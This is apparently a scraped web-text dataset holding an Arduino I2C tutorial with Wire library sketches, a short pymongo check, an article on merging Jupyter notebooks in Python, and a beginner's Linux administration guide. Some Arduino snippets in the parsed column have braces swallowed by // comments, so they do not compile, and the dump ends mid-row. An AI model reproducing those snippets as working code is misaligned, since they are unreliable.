Columns: title — string (3 to 221 chars); text — string (17 to 477k chars); parsed — list (0 to 3.17k items)
Arduino - Inter Integrated Circuit
Inter-Integrated Circuit (I2C) is a system for serial data exchange between microcontrollers and specialized integrated circuits. It is used when the distance between them is short (the receiver and transmitter are usually on the same printed circuit board). The connection is established via two conductors: one is used for data transfer and the other for synchronization (the clock signal).

One device on the bus is always the master. It addresses one slave chip before communication starts; in this way, one microcontroller can communicate with up to 112 different devices. The bit rate is usually 100 kbit/s (standard mode) or 10 kbit/s (low-speed mode); systems with bit rates up to 3.4 Mbit/s (high-speed mode) have also appeared. The distance between devices communicating over an I2C bus is limited to several meters.

The I2C bus consists of two signals, SCL and SDA. SCL is the clock signal and SDA is the data signal. The current bus master always generates the clock signal. Some slave devices may force the clock low at times to delay the master sending more data (or to gain more time to prepare data before the master attempts to clock it out). This is known as "clock stretching".

Following are the I2C pins for different Arduino boards:
Uno, Pro Mini: A4 (SDA), A5 (SCL)
Mega, Due: 20 (SDA), 21 (SCL)
Leonardo, Yun: 2 (SDA), 3 (SCL)

To connect two Arduino boards over I2C, one board runs master code and the other runs slave code. The two combinations are:
Master Transmitter / Slave Receiver
Master Receiver / Slave Transmitter

Let us first see what master transmitter and slave receiver means.

The following functions are used to initialize the Wire library and join the I2C bus as a master or slave. Wire.begin() is normally called only once.

Wire.begin(address) − address is the optional 7-bit slave address; if no address is specified, the device joins the bus as a master.

Wire.beginTransmission(address) − Begins a transmission to the I2C slave device with the given address.

Wire.write(value) − Queues bytes for transmission from the master to a slave device (in between calls to beginTransmission() and endTransmission()).

Wire.endTransmission() − Ends a transmission to a slave device that was begun by beginTransmission() and transmits the bytes that were queued by Wire.write().

Example

#include <Wire.h> // include Wire library

void setup() { // this will run only once
   Wire.begin(); // join the I2C bus as master
}

short age = 0;

void loop() {
   Wire.beginTransmission(2); // transmit to device #2
   Wire.write("age is = ");
   Wire.write(age);           // sends one byte
   Wire.endTransmission();    // stop transmitting
   delay(1000);
}

The slave receiver uses the following functions −

Wire.begin(address) − address is the 7-bit slave address.

Wire.onReceive(handler) − Registers a function to be called when the slave device receives data from the master.
Wire.available() − Returns the number of bytes available for retrieval with Wire.read(). This should be called inside the Wire.onReceive() handler.

Example

#include <Wire.h> // include Wire library

void setup() { // this will run only once
   Wire.begin(2);                // join the I2C bus with address #2
   Wire.onReceive(receiveEvent); // call receiveEvent when the master sends anything
   Serial.begin(9600);           // start serial output to print what we receive
}

void loop() {
   delay(250);
}

// this function will execute whenever data is received from the master
void receiveEvent(int howMany) {
   while (Wire.available() > 1) { // loop through all but the last byte
      char c = Wire.read();       // receive byte as a character
      Serial.print(c);            // print the character
   }
   int x = Wire.read();           // receive the last byte as an integer
   Serial.println(x);
}

Let us now see what master receiver and slave transmitter means. The master is programmed to request, and then read, bytes of data that are sent from the uniquely addressed slave Arduino.

The following function is used −

Wire.requestFrom(address, quantity) − Used by the master to request bytes from a slave device. The bytes may then be retrieved with the Wire.available() and Wire.read() functions.

Example

#include <Wire.h> // include Wire library

void setup() {
   Wire.begin();       // join the I2C bus (address optional for master)
   Serial.begin(9600); // start serial for output
}

void loop() {
   Wire.requestFrom(2, 1);    // request 1 byte from slave device #2
   while (Wire.available()) { // slave may send less than requested
      char c = Wire.read();   // receive a byte as character
      Serial.print(c);        // print the character
   }
   delay(500);
}

The slave transmitter uses the following function.

Wire.onRequest(handler) − Registers a function to be called when a master requests data from this slave device.

Example

#include <Wire.h>

void setup() {
   Wire.begin(2);                // join the I2C bus with address #2
   Wire.onRequest(requestEvent); // register event
}

byte x = 0;

void loop() {
   delay(100);
}

// function that executes whenever data is requested by the master
// this function is registered as an event, see setup()
void requestEvent() {
   Wire.write(x); // respond with a message of 1 byte as expected by the master
   x++;
}
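One detail the examples above do not show: on common Arduino cores, Wire.endTransmission() returns a status byte (0 on success, non-zero on errors such as a NACK on the address), which is useful for checking whether the addressed slave is actually present. The exact codes may vary between cores, so treat the values in this sketch as an assumption to verify against your board's Wire documentation.

#include <Wire.h>

void setup() {
   Wire.begin();       // join the I2C bus as master
   Serial.begin(9600);
}

void loop() {
   Wire.beginTransmission(2);            // address slave #2
   Wire.write("ping");
   byte status = Wire.endTransmission(); // 0 usually means success

   if (status == 0) {
      Serial.println("slave #2 acknowledged");
   } else {
      Serial.print("transmission failed, status = ");
      Serial.println(status);            // e.g. 2 often means NACK on address
   }
   delay(1000);
}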
[ { "code": null, "e": 3275, "s": 2870, "text": "Inter-integrated circuit (I2C) is a system for serial data exchange between the microcontrollers and specialized integrated circuits of a new generation. It is used when the distance between them is short (receiver and transmitter are usually on the same printed board). Connection is established via two conductors. One is used for data transfer and the other is used for synchronization (clock signal)." }, { "code": null, "e": 3733, "s": 3275, "text": "As seen in the following figure, one device is always a master. It performs addressing of one slave chip before the communication starts. In this way, one microcontroller can communicate with 112 different devices. Baud rate is usually 100 Kb/sec (standard mode) or 10 Kb/sec (slow baud rate mode). Systems with the baud rate of 3.4 Mb/sec have recently appeared. The distance between devices, which communicate over an I2C bus is limited to several meters." }, { "code": null, "e": 4108, "s": 3733, "text": "The I2C bus consists of two signals − SCL and SDA. SCL is the clock signal, and SDA is the data signal. The current bus master always generates the clock signal. Some slave devices may force the clock low at times to delay the master sending more data (or to require more time to prepare data before the master attempts to clock it out). This is known as “clock stretching”." }, { "code": null, "e": 4162, "s": 4108, "text": "Following are the pins for different Arduino boards −" }, { "code": null, "e": 4195, "s": 4162, "text": "Uno, Pro Mini A4 (SDA), A5 (SCL)" }, { "code": null, "e": 4224, "s": 4195, "text": "Mega, Due 20 (SDA), 21 (SCL)" }, { "code": null, "e": 4255, "s": 4224, "text": "Leonardo, Yun 2 (SDA), 3 (SCL)" }, { "code": null, "e": 4356, "s": 4255, "text": "We have two modes - master code and slave code - to connect two Arduino boards using I2C. They are −" }, { "code": null, "e": 4392, "s": 4356, "text": "Master Transmitter / Slave Receiver" }, { "code": null, "e": 4428, "s": 4392, "text": "Master Receiver / Slave Transmitter" }, { "code": null, "e": 4490, "s": 4428, "text": "Let us now see what is master transmitter and slave receiver." }, { "code": null, "e": 4632, "s": 4490, "text": "The following functions are used to initialize the Wire library and join the I2C bus as a master or slave. This is normally called only once." }, { "code": null, "e": 4770, "s": 4632, "text": "Wire.begin(address) − Address is the 7-bit slave address in our case as the master is not specified and it will join the bus as a master." }, { "code": null, "e": 4908, "s": 4770, "text": "Wire.begin(address) − Address is the 7-bit slave address in our case as the master is not specified and it will join the bus as a master." }, { "code": null, "e": 5011, "s": 4908, "text": "Wire.beginTransmission(address) − Begin a transmission to the I2C slave device with the given address." }, { "code": null, "e": 5114, "s": 5011, "text": "Wire.beginTransmission(address) − Begin a transmission to the I2C slave device with the given address." }, { "code": null, "e": 5259, "s": 5114, "text": "Wire.write(value) − Queues bytes for transmission from a master to slave device (in-between calls to beginTransmission() and endTransmission())." }, { "code": null, "e": 5404, "s": 5259, "text": "Wire.write(value) − Queues bytes for transmission from a master to slave device (in-between calls to beginTransmission() and endTransmission())." 
}, { "code": null, "e": 5563, "s": 5404, "text": "Wire.endTransmission() − Ends a transmission to a slave device that was begun by beginTransmission() and transmits the bytes that were queued by wire.write()." }, { "code": null, "e": 5722, "s": 5563, "text": "Wire.endTransmission() − Ends a transmission to a slave device that was begun by beginTransmission() and transmits the bytes that were queued by wire.write()." }, { "code": null, "e": 5730, "s": 5722, "text": "Example" }, { "code": null, "e": 6087, "s": 5730, "text": "#include <Wire.h> //include wire library\n\nvoid setup() //this will run only once { \n Wire.begin(); // join i2c bus as master\n} \n\nshort age = 0; \n\nvoid loop() { \n Wire.beginTransmission(2); \n // transmit to device #2\n Wire.write(\"age is = \");\n Wire.write(age); // sends one byte\n Wire.endTransmission(); // stop transmitting\n delay(1000); \n}" }, { "code": null, "e": 6122, "s": 6087, "text": "The following functions are used −" }, { "code": null, "e": 6180, "s": 6122, "text": "Wire.begin(address) − Address is the 7-bit slave address." }, { "code": null, "e": 6238, "s": 6180, "text": "Wire.begin(address) − Address is the 7-bit slave address." }, { "code": null, "e": 6351, "s": 6238, "text": "Wire.onReceive(received data handler) − Function to be called when a slave device receives data from the master." }, { "code": null, "e": 6464, "s": 6351, "text": "Wire.onReceive(received data handler) − Function to be called when a slave device receives data from the master." }, { "code": null, "e": 6611, "s": 6464, "text": "Wire.available() − Returns the number of bytes available for retrieval with Wire.read().This should be called inside the Wire.onReceive() handler." }, { "code": null, "e": 6758, "s": 6611, "text": "Wire.available() − Returns the number of bytes available for retrieval with Wire.read().This should be called inside the Wire.onReceive() handler." }, { "code": null, "e": 6766, "s": 6758, "text": "Example" }, { "code": null, "e": 7392, "s": 6766, "text": "#include <Wire.h> //include wire library\n\nvoid setup() { //this will run only once\n Wire.begin(2); // join i2c bus with address #2\n Wire.onReceive(receiveEvent); // call receiveEvent when the master send any thing \n Serial.begin(9600); // start serial for output to print what we receive \n}\n\nvoid loop() { \n delay(250); \n}\n\n//-----this function will execute whenever data is received from master-----//\n\nvoid receiveEvent(int howMany) { \n while (Wire.available()>1) // loop through all but the last {\n char c = Wire.read(); // receive byte as a character\n Serial.print(c); // print the character\n }\n}" }, { "code": null, "e": 7454, "s": 7392, "text": "Let us now see what is master receiver and slave transmitter." }, { "code": null, "e": 7577, "s": 7454, "text": "The Master, is programmed to request, and then read bytes of data that are sent from the uniquely addressed Slave Arduino." }, { "code": null, "e": 7610, "s": 7577, "text": "The following function is used −" }, { "code": null, "e": 7806, "s": 7610, "text": "Wire.requestFrom(address,number of bytes) − Used by the master to request bytes from a slave device. The bytes may then be retrieved with the functions wire.available() and wire.read() functions." 
}, { "code": null, "e": 7814, "s": 7806, "text": "Example" }, { "code": null, "e": 8268, "s": 7814, "text": "#include <Wire.h> //include wire library void setup() { \n Wire.begin(); // join i2c bus (address optional for master) \n Serial.begin(9600); // start serial for output\n} \n\nvoid loop() { \n Wire.requestFrom(2, 1); // request 1 bytes from slave device #2\n while (Wire.available()) // slave may send less than requested {\n char c = Wire.read(); // receive a byte as character\n Serial.print(c); // print the character\n } \n delay(500); \n}" }, { "code": null, "e": 8300, "s": 8268, "text": "The following function is used." }, { "code": null, "e": 8399, "s": 8300, "text": "Wire.onRequest(handler) − A function is called when a master requests data from this slave device." }, { "code": null, "e": 8407, "s": 8399, "text": "Example" }, { "code": null, "e": 8825, "s": 8407, "text": "#include <Wire.h> \n\nvoid setup() { \n Wire.begin(2); // join i2c bus with address #2\n Wire.onRequest(requestEvent); // register event\n} \n\nByte x = 0;\n\nvoid loop() { \n delay(100); \n} \n\n// function that executes whenever data is requested by master\n// this function is registered as an event, see setup()\n\nvoid requestEvent() { \n Wire.write(x); // respond with message of 1 bytes as expected by master\n x++; \n}" }, { "code": null, "e": 8860, "s": 8825, "text": "\n 65 Lectures \n 6.5 hours \n" }, { "code": null, "e": 8871, "s": 8860, "text": " Amit Rana" }, { "code": null, "e": 8904, "s": 8871, "text": "\n 43 Lectures \n 3 hours \n" }, { "code": null, "e": 8915, "s": 8904, "text": " Amit Rana" }, { "code": null, "e": 8948, "s": 8915, "text": "\n 20 Lectures \n 2 hours \n" }, { "code": null, "e": 8961, "s": 8948, "text": " Ashraf Said" }, { "code": null, "e": 8996, "s": 8961, "text": "\n 19 Lectures \n 1.5 hours \n" }, { "code": null, "e": 9009, "s": 8996, "text": " Ashraf Said" }, { "code": null, "e": 9041, "s": 9009, "text": "\n 11 Lectures \n 47 mins\n" }, { "code": null, "e": 9054, "s": 9041, "text": " Ashraf Said" }, { "code": null, "e": 9085, "s": 9054, "text": "\n 9 Lectures \n 41 mins\n" }, { "code": null, "e": 9098, "s": 9085, "text": " Ashraf Said" }, { "code": null, "e": 9105, "s": 9098, "text": " Print" }, { "code": null, "e": 9116, "s": 9105, "text": " Add Notes" } ]
Tryit Editor v3.6 - Show Python
import pymongo
# if this page is executed with no errors, you have the "pymongo" module installed.
How To Easily Merge Multiple Jupyter Notebooks Into One | by Amal Hasni | Towards Data Science
Written by: Amal Hasni & Dhia Hmila

Jupyter Notebooks are essential tools for data scientists. They offer multiple practical options for interactive computing, as they combine code, text, and visualizations in a single document. It is common to use multiple separate notebooks in a single project for organizational purposes. The problem is that when a manager or a client asks for a quick demo and you need to merge your different notebooks quickly, reorganizing cells can be a long, tedious sequence of copy-paste.

Since Jupyter's interface doesn't make this easy, we thought it was time to create our own solution. In this article, we will show you how to reorganize and concatenate two notebooks in a time-efficient way. What you'll learn will allow you to reorganize, filter, and change a notebook's cells using Python code.

Table of contents:
· Getting to know a notebook's structure
· Concatenating notebooks
· Going further with nbformat

I don't know if you've ever tried to open a Jupyter notebook file (which has .ipynb as an extension) with a text editor. If you did, you've either seen weird gibberish or you've recognized the JSON format. If you don't know what the JSON format is, it stands for JavaScript Object Notation and is a way to store objects/data in a human-readable way. It's quite neat and simple.

So, like I said, IPYNB files are stored in the JSON plain-text format, and if you open one up you will find a well-structured dictionary containing:

metadata: basically a dictionary containing information about the kernel and language that are used (and more).
nbformat and nbformat_minor: these are just the notebook format version (here it's 4.0).
cells: this is what we'll most likely be interested in, and it contains a list of the notebook's cells.

Each cell is represented by a similar dictionary containing different key-value pairs (cell_type, source, metadata, outputs, and so on).

Now you know enough to start playing with the notebook's cells. But if you want to go into more detail, you can check out the notebook format documentation.

So the practical example we chose is merging two notebooks together. It's a fairly simple example, but you'll get to see how to read, write, and tweak notebooks, and depending on your use case you can adapt the code to your needs. If you want, you can download example notebooks to try the code.

So let's start by implementing a function to read IPYNB files. We'll use the json module included in Python's standard library (a sketch of the helpers referenced here is given at the end of this section). Now reading the files only takes two lines of code:

first_notebook = read_ipynb('first_notebook.ipynb')
second_notebook = read_ipynb('second_notebook.ipynb')

Though we probably don't necessarily need to copy the notebook in this example, it may come in handy if you want to play around with the notebooks. Here, again, we'll use the copy module of the standard library:

import copy
final_notebook = copy.deepcopy(first_notebook)

So here comes the part where we actually merge the cells:

final_notebook['cells'] = first_notebook['cells'] + second_notebook['cells']

And finally, we write a helper function to export the notebook into the Jupyter Notebook format and export our final_notebook with it.

The Jupyter development team also gives us the nbformat package to make similar operations easy, such as reading ipynb files or creating new code cells with nbformat.v4.new_code_cell.
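The helper functions referenced above (read_ipynb, write_ipynb) were originally embedded as external code snippets and are not shown in this text, so the following is a minimal reconstruction rather than the authors' exact code. The function names follow the article's usage; the implementation details, and the merge_with_nbformat helper name, are assumptions.

import json
import copy
import nbformat  # ships with Jupyter; otherwise: pip install nbformat

def read_ipynb(notebook_path):
    # A notebook is just JSON on disk, so the standard library is enough.
    with open(notebook_path, encoding='utf-8') as f:
        return json.load(f)

def write_ipynb(notebook, notebook_path):
    # Write the (possibly modified) notebook dictionary back to disk.
    with open(notebook_path, 'w', encoding='utf-8') as f:
        json.dump(notebook, f, indent=1)

# Plain-json merge, as described in the article:
first_notebook = read_ipynb('first_notebook.ipynb')
second_notebook = read_ipynb('second_notebook.ipynb')
final_notebook = copy.deepcopy(first_notebook)
final_notebook['cells'] = first_notebook['cells'] + second_notebook['cells']
write_ipynb(final_notebook, 'final_notebook.ipynb')

# Equivalent merge using nbformat:
def merge_with_nbformat(path_a, path_b, out_path):
    nb_a = nbformat.read(path_a, as_version=4)
    nb_b = nbformat.read(path_b, as_version=4)
    merged = copy.deepcopy(nb_a)
    merged.cells = nb_a.cells + nb_b.cells
    nbformat.write(merged, out_path)

merge_with_nbformat('first_notebook.ipynb', 'second_notebook.ipynb', 'final_nbformat.ipynb')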
To have an example, let’s reproduce the equivalent code to concatenate two notebooks with nbformat: If you want a more exhaustive list of functions provided by nbformat, you can check out their documentation in the following link. Taking a deeper look at the structure of a Jupyter Notebook gives the necessary knowledge to create solutions for cell manipulation. This article details two solutions that give you a workaround for the tedious copy-pasting you’ll normally need to merge two Notebooks into one. You’ll find all the code used in this article in this Github repository. Depending on your use case, you can go further and create scripts to make other modifications you need in an automatic, time-efficient way. We hope you found this article useful. Thank you for sticking around this far, stay safe and we will see you in our next article 😊!
[ { "code": null, "e": 208, "s": 172, "text": "Written by: Amal Hasni & Dhia Hmila" }, { "code": null, "e": 698, "s": 208, "text": "Juypyter Notebooks are very essential tools for Data Scientists. They offer multiple practical options for interactive computing as they combine code, text, and visualizations in a single document. It is common to choose to use multiple separate Notebooks in a single project for organizational purposes. The problem is when a manager or a client asks for a quick demo and you need to merge your different Notebooks quickly, reorganizing cells can be a long tedious sequence of copy-paste." }, { "code": null, "e": 1004, "s": 698, "text": "Since Jupyter’s interface doesn’t make it easy, we thought It’s time to create our own solution. In this article, we will show you how to reorganize and concatenate two notebooks in a time-efficient way. What you’ll learn will allow you to reorganize, filter, change the notebook’s cell using python code." }, { "code": null, "e": 1116, "s": 1004, "text": "Table Of Contents:· Getting to know Notebooks’s structure· Concatenating Notebooks· Going further with nbformat" }, { "code": null, "e": 1321, "s": 1116, "text": "I don’t know if you’ve ever tried to open a Jupyter notebook file (that has .ipynb as an extension) with a text editor. If you did, you’ve either seen weird gibberish or you’ve recognized the JSON format." }, { "code": null, "e": 1531, "s": 1321, "text": "If you don’t know what the JSON format is, it stands for JavaScript Object Notation and is a way to store objects/data in a human-readable way. It’s quite neat and simple (you can learn more about this here )." }, { "code": null, "e": 1650, "s": 1531, "text": "So like I’ve said IPYNB files are stored in the JSON plain text format and if you open one up, it will look like this:" }, { "code": null, "e": 1712, "s": 1650, "text": "As you can see, it’s a well-structured dictionary containing:" }, { "code": null, "e": 1827, "s": 1712, "text": "metadata: basically, a dictionary containing information about the kernel and language that are used ( and more )." }, { "code": null, "e": 1915, "s": 1827, "text": "nbformat and nbformat_minor: These are just the notebook format version (here it’s 4.0)" }, { "code": null, "e": 2018, "s": 1915, "text": "cells: This is what we’ll, most likely, be interested in and it contains a list of the notebook cells." }, { "code": null, "e": 2105, "s": 2018, "text": "Each cell is represented by a similar dictionary containing different key-value pairs:" }, { "code": null, "e": 2159, "s": 2105, "text": "You can see in this screenshot where each field goes:" }, { "code": null, "e": 2315, "s": 2159, "text": "Now you know enough to start playing with the notebook’s cells. But, if you want to go more into details, you can check out the documentation at this link." }, { "code": null, "e": 2549, "s": 2315, "text": "So the practical example we chose is merging two notebooks together. It’s a fairly simple example but you’ll get to see how to read, write and tweak the notebooks, and depending on your use case, you can adapt the code to your needs." }, { "code": null, "e": 2627, "s": 2549, "text": "If you want, you can download example notebooks to try the code at this link." }, { "code": null, "e": 2755, "s": 2627, "text": "So let’s start by implementing a function to read IPYNB files. 
We’ll use the json module included in python's standard library:" }, { "code": null, "e": 2807, "s": 2755, "text": "Now reading the files only takes two lines of code:" }, { "code": null, "e": 2912, "s": 2807, "text": "first_notebook = read_ipynb('first_notebook.ipynb')second_notebook = read_ipynb('second_notebook.ipynb')" }, { "code": null, "e": 3124, "s": 2912, "text": "Though we probably don’t necessarily need to copy the notebook in this example, it may come in handy if you want to play around with the notebooks. Here, again, we’ll use the copy module of the standard library:" }, { "code": null, "e": 3182, "s": 3124, "text": "import copyfinal_notebook = copy.deepcopy(first_notebook)" }, { "code": null, "e": 3240, "s": 3182, "text": "So here comes the part where we actually merge the cells:" }, { "code": null, "e": 3317, "s": 3240, "text": "final_notebook['cells'] = first_notebook['cells'] + second_notebook['cells']" }, { "code": null, "e": 3455, "s": 3317, "text": "And finally, let’s write a helper function to export the notebook into the Jupyter Notebook format and export our final_notebook with it:" }, { "code": null, "e": 3628, "s": 3455, "text": "The Jupyter Development Team gave us the package nbformat to make similar operations such as reading ipynb files or creating new code cells with nbformat.v4.new_code_cell ." }, { "code": null, "e": 3728, "s": 3628, "text": "To have an example, let’s reproduce the equivalent code to concatenate two notebooks with nbformat:" }, { "code": null, "e": 3859, "s": 3728, "text": "If you want a more exhaustive list of functions provided by nbformat, you can check out their documentation in the following link." }, { "code": null, "e": 4210, "s": 3859, "text": "Taking a deeper look at the structure of a Jupyter Notebook gives the necessary knowledge to create solutions for cell manipulation. This article details two solutions that give you a workaround for the tedious copy-pasting you’ll normally need to merge two Notebooks into one. You’ll find all the code used in this article in this Github repository." }, { "code": null, "e": 4350, "s": 4210, "text": "Depending on your use case, you can go further and create scripts to make other modifications you need in an automatic, time-efficient way." } ]
string.upper() function in Lua programming
There are certain scenarios where, when working with strings, we want a string to be in uppercase. Consider a very basic yet familiar example of such a scenario: the PAN number. Imagine that you are building a web form that has a field for the user's PAN number. Since a PAN number can't contain lowercase letters, we need to take the user input of that field and convert the string to its uppercase form.

Converting a string to uppercase in Lua is done with the string.upper() function.

string.upper(s)

In the above syntax, the identifier s denotes the string that we are trying to convert to uppercase.

Let's consider a very simple example, where we convert a string literal to uppercase. Consider the example shown below −

s = string.upper("abc")
print(s)

Output
ABC

An important point to note about the string.upper() function is that it doesn't modify the original string; it returns a new, uppercased copy. Let's explore this particular case with the help of an example. Consider the example shown below −

s = "abc"
s1 = string.upper(s)
print(s)
print(s1)

Output
abc
ABC

Also, if a string is already in its uppercase form, then nothing will change. Consider the example shown below −

s = string.upper("A")
print(s)

Output
A
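Since Lua strings expose the string library functions as methods, the same conversion can also be written with the colon syntax, which reads naturally when uppercasing user input such as the PAN number mentioned above. The io.read() call below is just an illustrative way to obtain input; adapt it to wherever your form data actually comes from.

-- method-call form: s:upper() is equivalent to string.upper(s)
local s = "abc"
print(s:upper())          --> ABC

-- uppercasing user input, e.g. a PAN number typed on stdin
local pan = io.read()     -- reads one line
print(string.upper(pan))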
[ { "code": null, "e": 1275, "s": 1062, "text": "There are certain scenarios in our code that when we are working with the strings, we might want some string to be in uppercase, like consider a very basic and yet famous example of such scenario, the PAN number." }, { "code": null, "e": 1518, "s": 1275, "text": "Imagine that you are making a web form in which there’s a field for the PAN number of the user, and since you know that PAN number can’t be in lowercases, we need to take the user input of that field and convert the string into its uppercase." }, { "code": null, "e": 1602, "s": 1518, "text": "Converting a string to its uppercase in Lua is done by the string.upper() function." }, { "code": null, "e": 1618, "s": 1602, "text": "string.upper(s)" }, { "code": null, "e": 1726, "s": 1618, "text": "In the above syntax, the identifier s denotes the string which we are trying to convert into its uppercase." }, { "code": null, "e": 1835, "s": 1726, "text": "Let’s consider a very simple example of the same, where we will convert a string literal into its uppercase." }, { "code": null, "e": 1870, "s": 1835, "text": "Consider the example shown below −" }, { "code": null, "e": 1881, "s": 1870, "text": " Live Demo" }, { "code": null, "e": 1914, "s": 1881, "text": "s = string.upper(\"abc\")\nprint(s)" }, { "code": null, "e": 1918, "s": 1914, "text": "ABC" }, { "code": null, "e": 2159, "s": 1918, "text": "An important point to note about the string.upper() function is that it doesn’t modify the original string, it just does the modification to a copy of it and returns that copy. Let’s explore this particular case with the help of an example." }, { "code": null, "e": 2194, "s": 2159, "text": "Consider the example shown below −" }, { "code": null, "e": 2205, "s": 2194, "text": " Live Demo" }, { "code": null, "e": 2259, "s": 2205, "text": "s = \"abc\"\ns1 = string.upper(\"abc\")\nprint(s)\nprint(s1)" }, { "code": null, "e": 2267, "s": 2259, "text": "abc\nABC" }, { "code": null, "e": 2344, "s": 2267, "text": "Also, if a string is already in its uppercase form then nothing will change." }, { "code": null, "e": 2379, "s": 2344, "text": "Consider the example shown below −" }, { "code": null, "e": 2390, "s": 2379, "text": " Live Demo" }, { "code": null, "e": 2425, "s": 2390, "text": "s = \"A\"\nstring.upper(\"A\")\nprint(s)" }, { "code": null, "e": 2427, "s": 2425, "text": "A" } ]
Beginner's Guide to Linux System Administration - GeeksforGeeks
23 Aug, 2021

A Linux system administrator manages operations such as maintaining software, monitoring systems, and taking care of backups and hardware. It is recommended that before reading this article you go through the article What is Linux System Administration. Here we cover some basics of Linux system administration.

Set the hostname: Open a terminal and enter the following command to change the hostname (this sets it for the current session):

sudo hostname your_hostname

Replace "your_hostname" with the hostname that you want to keep.

Setting the time zone: Link the appropriate zone file from /usr/share/zoneinfo to /etc/localtime to set the time zone, for example:

sudo ln -sf /usr/share/zoneinfo/Asia/Kolkata /etc/localtime

Managing files is one of the most important tasks in Linux, as devices, directories, and packages are all just types of files in Linux.

1. To know about the file system, read the article File System in Linux.
2. To learn more about the Linux file hierarchy structure, read the article Linux File System Hierarchy.
3. To see the difference between the Linux and Windows file systems, read the article Windows vs Linux.

Some commonly used file management commands are collected in the sketch at the end of this article. You can also read about file management in Linux from the article https://www.geeksforgeeks.org/file-management-in-linux/

Networking commands play an important role in system administration, and a good system administrator must have good hands-on experience with them. Representative networking commands are also included in the sketch at the end of this article. To learn more about Linux networking commands, read the article Linux Networking Tools.

A system administrator has to manage the users working on the system. Users are the accounts that are logged in to the system or may log in to it. Each user in Linux has a unique UID to identify the user. Information about users is stored in the /etc/passwd file, and hashed passwords are stored in the /etc/shadow file. There are basically two types of users in Linux on the basis of their access rights:

Superuser or administrator
General users

Each user may or may not be part of a group, which is a collection of users. To learn more about users in Linux, go through the article Users in Linux System Administration. Commands used to manage users and groups are also listed in the sketch at the end of this article.

To learn more about how to manage users, read the article User Management in Linux.
To learn more about how to manage groups, read the article Group Management in Linux.

A system administrator should be able to diagnose problems in a system and monitor its performance so that it can be improved; typical monitoring commands appear in the sketch below as well.

A good system administrator must also have an idea of how to read and manage logs, as they give a lot of crucial and required information.
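The article refers to command tables that are not reproduced here, so the following is a representative, non-exhaustive sketch of commands commonly covered under each of the headings above; it is an illustrative selection, not the article's original tables.

# --- File management ---
ls -l              # list directory contents
cp src dst         # copy files
mv src dst         # move or rename files
rm file            # remove a file
mkdir dir          # create a directory
find / -name x     # search for files
chmod 644 file     # change permissions
chown user file    # change ownership

# --- Networking ---
ping example.com        # test reachability
ip addr                 # show interfaces and addresses (older: ifconfig)
ss -tulpn               # show listening sockets (older: netstat)
traceroute example.com  # trace the route to a host
ssh user@host           # remote login
scp file user@host:~    # copy files over SSH

# --- User and group management ---
useradd alice           # create a user
passwd alice            # set a password
usermod -aG sudo alice  # add a user to a group
userdel alice           # delete a user
groupadd devs           # create a group
id alice                # show UID, GID and groups

# --- Monitoring and diagnostics ---
top             # live process and CPU/memory view
ps aux          # snapshot of running processes
free -h         # memory usage
df -h           # disk space per filesystem
du -sh dir      # size of a directory
dmesg           # kernel ring buffer
journalctl -xe  # systemd logs (where systemd is used)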
[ { "code": null, "e": 24636, "s": 24608, "text": "\n23 Aug, 2021" }, { "code": null, "e": 24970, "s": 24636, "text": "A Linux System Administrator manages the operations such as maintaining proper software, observing them, and even taking care of backup and hardware systems. It is recommended that before reading this article please go through the article What is Linux System Administration. Here we have some basics of Linux System Administration. " }, { "code": null, "e": 25069, "s": 24970, "text": "Set the Hostname: Open terminal and enter the following command in order to change the hostname. " }, { "code": null, "e": 25097, "s": 25069, "text": "sudo hostname your_hostname" }, { "code": null, "e": 25163, "s": 25097, "text": "Replace “your_hostname” with the hostname that you want to keep. " }, { "code": null, "e": 25299, "s": 25163, "text": "Setting up the time zone: Move to /usr/share/zoneinfo/your_zone and then link the zone file with /etc/localtime to set the time zone. " }, { "code": null, "e": 25334, "s": 25299, "text": "sudo ln -sf Kolkata /etc/localtime" }, { "code": null, "e": 25462, "s": 25334, "text": "Managing files is the most important task in Linux as all devices, directories, and packages are just a type of file in Linux. " }, { "code": null, "e": 25735, "s": 25462, "text": "1. To know about File system read the article File System in Linux. 2. To learn more about Linux file hierarchy structure you can read the article Linux File System Hierarchy 3. To get the difference between Linux and Windows File System read the article Windows vs Linux " }, { "code": null, "e": 25798, "s": 25735, "text": "Below is the list of some file management commands in Linux: " }, { "code": null, "e": 25920, "s": 25798, "text": "You can also read the file management in Linux from the article https://www.geeksforgeeks.org/file-management-in-linux/ " }, { "code": null, "e": 26144, "s": 25920, "text": "Networking commands play an important role in system Administration and a good system Administrator must have good hands-on networking commands. Here is a list of such commands that are mostly used for networking in Linux. " }, { "code": null, "e": 26237, "s": 26144, "text": "To learn more about Linux networking commands then read the article Linux Networking Tools " }, { "code": null, "e": 26655, "s": 26237, "text": "A system administrator has to manage the users working on the system. Users are the accounts which are logged in to your system or may log in to the system. Each user in Linux has a unique UID to identify the user. All information of the users is stored in /etc/passwd file and all hashed passwords are stored in /etc/shadow file. There are basically 2 types of user in Linux on the basis of their rights to access. " }, { "code": null, "e": 26682, "s": 26655, "text": "Superuser or Administrator" }, { "code": null, "e": 26696, "s": 26682, "text": "General users" }, { "code": null, "e": 26929, "s": 26696, "text": "Each user may or may not be a part of a group which is a collection of users. To learn more about users in Linux go through the article Users in Linux System Administration. Here is a list of commands that are used to manage users. 
" }, { "code": null, "e": 27012, "s": 26929, "text": "To learn more about how to manage users read the article User Management in Linux " }, { "code": null, "e": 27097, "s": 27012, "text": "To learn more about how to manage groups read the article Group Management in Linux " }, { "code": null, "e": 27302, "s": 27097, "text": "A System Administrator should be able to diagnose problems in a system and even to monitor the performance of the system so that it may be improved. Here is the list of some useful commands for the same. " }, { "code": null, "e": 27436, "s": 27302, "text": "A good system Administrator must have an idea of how to read and manage logs as they give a lot of crucial and required information. " }, { "code": null, "e": 27448, "s": 27438, "text": "ruhelaa48" }, { "code": null, "e": 27470, "s": 27448, "text": "Linux-system-commands" }, { "code": null, "e": 27481, "s": 27470, "text": "Linux-Unix" }, { "code": null, "e": 27579, "s": 27481, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27617, "s": 27579, "text": "TCP Server-Client implementation in C" }, { "code": null, "e": 27652, "s": 27617, "text": "ZIP command in Linux with examples" }, { "code": null, "e": 27687, "s": 27652, "text": "tar command in Linux with examples" }, { "code": null, "e": 27728, "s": 27687, "text": "SORT command in Linux/Unix with examples" }, { "code": null, "e": 27764, "s": 27728, "text": "curl command in Linux with Examples" }, { "code": null, "e": 27797, "s": 27764, "text": "'crontab' in Linux with Examples" }, { "code": null, "e": 27835, "s": 27797, "text": "UDP Server-Client implementation in C" }, { "code": null, "e": 27873, "s": 27835, "text": "Conditional Statements | 